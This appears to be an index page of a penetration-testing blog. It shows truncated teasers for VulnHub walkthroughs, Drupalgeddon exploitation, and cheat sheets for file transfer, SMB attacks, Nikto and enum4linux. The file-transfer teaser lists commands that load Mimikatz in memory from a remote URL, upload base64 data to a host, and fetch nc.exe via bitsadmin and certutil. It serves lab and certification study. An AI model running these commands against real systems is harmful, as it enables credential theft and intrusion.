VulnHUB C0lddboxx-Easy: Walkthrough
Views: 4Enumeration Nmap
Attacking Drupal
Views: 30Leveraging Known Vulnerabilities Over the years, Drupal core has suffered from a few serious remote code execution vulnerabilities, each dubbed Drupalgeddon. At the time of writing, there are 3 Drupalgeddon vulnerabilities in existence. Drupalgeddon Manual exploitation As stated previously, this flaw can be exploited by leveraging a pre-authentication SQL injection which can be used to … Read more
Walkthrough – VulnHUB DC-1
Views: 13Enumeration Nmap scan Nmap scan reveals that the target is running a website based on Drupal CMS on port 80. Newer installs of Drupal by default block access to the CHANGELOG.txt and README.txt files, so we may need to do further enumeration. Although the target is running an older version of Drupal (7), these two files are not present … Read more
FILE TRANSFER – Cheat Sheet
Views: 9 Command Description Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1 Download a file with PowerShell IEX (New-Object Net.WebClient).DownloadString(‘https://<snip>/Invoke-Mimikatz.ps1’) Execute a file in memory using PowerShell Invoke-WebRequest -Uri http://10.10.10.1:443 -Method POST -Body $b64 Upload a file with PowerShell bitsadmin /transfer n http://10.10.10.1/nc.exe C:\Temp\nc.exe Download a file using Bitsadmin certutil.exe -verifyctl -split -f http://10.10.10.1/nc.exe Download a file using Certutil … Read more
Nikto Cheat Sheet
Views: 20Nikto Cheat Sheet COMMAND DESCRIPTION nikto -h http://nlabs.local Scans the specified host nikto -h http://nlabs.local -Tuning 6 Uses a specific scan tuning level nikto -h http://nlabs.local -port 8080 Scans the specified port nikto -h http://nlabs.local -ssl Scans for SSL vulnerabilities nikto -h http://nlabs.local -Format html Formats output in HTML nikto -h http://nlabs.local -output out.txt … Read more
Enum4Linux Cheat sheet
Views: 39enum4linux Cheat Sheet COMMAND DESCRIPTION enum4linux -v target-ip Verbose mode, shows the underlying commands being executed by enum4linux enum4linux -a target-ip Do Everything, runs all options apart from dictionary based share name guessing enum4linux -U target-ip Lists usernames, if the server allows it – (RestrictAnonymous = 0) enum4linux -u administrator-p password -U target-ip If … Read more
Linux Commands – Cheat Sheet
Views: 6Bash Commands uname -a Show system and kernel head -n1 /etc/issue Show distribution mount Show mounted filesystems date Show system date uptime Show uptime whoami Show your username man command Show manual for command ls Options -a Show all (including hidden) -R Recursive list -r Reverse order -t Sort by last modified -S Sort by file … Read more
Cheat sheet – SMB Attacks
Views: 26Exploiting SMB SMB Enumeration Nmap Enumeration Command Description smbclient -N -L //10.10.10.1 Null-session testing against the SMB service. smbmap -H 10.10.10.1 Network share enumeration using smbmap. smbmap -H 10.10.10.1 -r notes Recursive network share enumeration using smbmap. smbmap -H 10.10.10.1 –download “notes\note.txt” Download a specific file from the shared folder. smbmap -H 10.10.10.1 –upload test.txt “notes\test.txt” … Read more
ATTACKING COMMONLY USED SERVICES: PART_03 Exploiting SMB
Views: 32Server Message Block (SMB) is a communication protocol created for providing shared access to files and printers across nodes on a network. Initially, it was designed to run on top of NetBIOS over TCP/IP (NBT) using TCP port 139 and UDP ports 137 and 138. However, with Windows 2000, Microsoft added the option to run SMB directly over TCP/IP … Read more
Helpful Websites
Views: 5Wordlists General Linux Kernel CVEs | All CVEs https://github.com/lucyoa/kernel-exploits Basic Linux Privilege Escalation – https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Linux Privilege Escalation – https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md Checklist – Linux Privilege Escalation – https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist Sushant 747’s Guide (Country dependant – may need VPN) – https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html Linux Privilege Escalation LinPeas – https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS LinEnum – https://github.com/rebootuser/LinEnum Linux Exploit Suggester – https://github.com/mzet-/linux-exploit-suggester Linux Priv Checker – https://github.com/sleventyeleven/linuxprivchecker PayLoadAlltheThings https://github.com/swisskyrepo/PayloadsAllTheThings